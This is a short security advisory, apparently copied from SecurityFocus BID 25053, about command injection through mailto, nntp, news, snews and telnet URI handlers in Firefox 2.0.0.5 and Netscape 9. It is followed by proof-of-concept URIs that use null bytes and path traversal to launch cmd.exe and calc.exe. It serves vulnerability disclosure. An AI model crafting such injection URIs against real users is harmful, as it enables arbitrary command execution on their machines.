31 lines
No EOL
1.6 KiB
Text
31 lines
No EOL
1.6 KiB
Text
source: https://www.securityfocus.com/bid/25053/info
|
||
|
||
Multiple browsers are prone to vulnerabilities that let attackers inject commands through various protocol handlers.
|
||
|
||
Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through processes such as 'cmd.exe' by employing various URI handlers.
|
||
|
||
An attacker can exploit these issues to carry out various attacks by executing arbitrary commands on a vulnerable computer.
|
||
|
||
Exploiting these issues would permit remote attackers to influence command options that can be called through protocol handlers and to execute commands with the privileges of a user running the application. Successful attacks may result in a variety of consequences, including remote unauthorized access.
|
||
|
||
Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9 are reported vulnerable to these issues. Other versions of these browsers and other vendors' browsers may also be affected.
|
||
|
||
mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat
|
||
|
||
nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat
|
||
|
||
news:windows/system32/calc.exe%20"%20-%20"%20blah.bat
|
||
|
||
snews:windows/system32/calc.exe%20"%20-%20"%20blah.bat
|
||
|
||
telnet:windows/system32/calc.exe%20"%20-%20"%20blah.bat
|
||
|
||
telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l
|
||
|
||
news:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1
|
||
|
||
nntp:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1
|
||
|
||
snews:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1
|
||
|
||
mailto:// C:\lotus\notes\notes.exe /defini %1 |